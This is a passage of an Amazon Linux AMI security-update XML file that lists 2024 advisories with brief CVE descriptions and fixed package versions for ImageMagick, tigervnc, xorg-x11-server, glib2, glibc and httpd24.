</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5841" title="" id="CVE-2016-5841" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13139" title="" id="CVE-2017-13139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" 
title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.68-3.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1927</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1927: important priority package update for tigervnc</title><issued date="2024-04-11 01:43:00" /><updated date="2024-04-15 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-31083:
The ProcRenderAddGlyphs() function calls the AllocateGlyph() function to store new glyphs sent by the client to the X server. AllocateGlyph() would return a new glyph with refcount=0 and a re-used glyph would end up not changing the refcount at all. The resulting glyph_new array would thus have multiple entries pointing to the same non-refcounted glyphs.
ProcRenderAddGlyphs() may free a glyph, resulting in a use-after-free when the same glyph pointer is then later used.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31083" title="" id="CVE-2024-31083" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-debuginfo" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-21.36.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-21.36.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-21.36.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-21.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1928</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1928: important priority package update for xorg-x11-server</title><issued date="2024-04-11 01:43:00" /><updated 
date="2024-04-15 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-31083:
The ProcRenderAddGlyphs() function calls the AllocateGlyph() function to store new glyphs sent by the client to the X server. AllocateGlyph() would return a new glyph with refcount=0 and a re-used glyph would end up not changing the refcount at all. The resulting glyph_new array would thus have multiple entries pointing to the same non-refcounted glyphs.
ProcRenderAddGlyphs() may free a glyph, resulting in a use-after-free when the same glyph pointer is then later used.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31083" title="" id="CVE-2024-31083" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-devel" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.55.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.55.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-devel" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1929</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1929: important priority package update for glib2</title><issued date="2024-04-11 01:43:00" /><updated date="2024-04-15 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-35457:
GNOME GLib before 2.65.3 has an integer overflow, that might lead to an out-of-bounds write, in g_option_group_add_entries. NOTE: the vendor's position is "Realistically this is not a security issue. The standard pattern is for callers to provide a static list of option entries in a fixed number of calls to g_option_group_add_entries()." The researcher states that this pattern is undocumented.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35457" title="" id="CVE-2020-35457" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.27.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.27.amzn1.noarch.rpm</filename></package><package name="glib2" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.27.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.27.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.27.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1930</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1930: important priority package update for 
glibc</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-2961:
The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2961" title="" id="CVE-2024-2961" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-utils" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" 
release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-324.190.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1931</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1931: important priority package update for httpd24</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-27316:
HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27316" title="" id="CVE-2024-27316" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.59" release="1.102.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.59" release="1.102.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.59-1.102.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.59" release="1.102.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package 
name="httpd24-debuginfo" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.59" release="1.102.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.59" release="1.102.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.59-1.102.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1932</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1932: important priority package update for xorg-x11-server</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2024-21886:
Heap buffer overflow in DisableDevice
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b
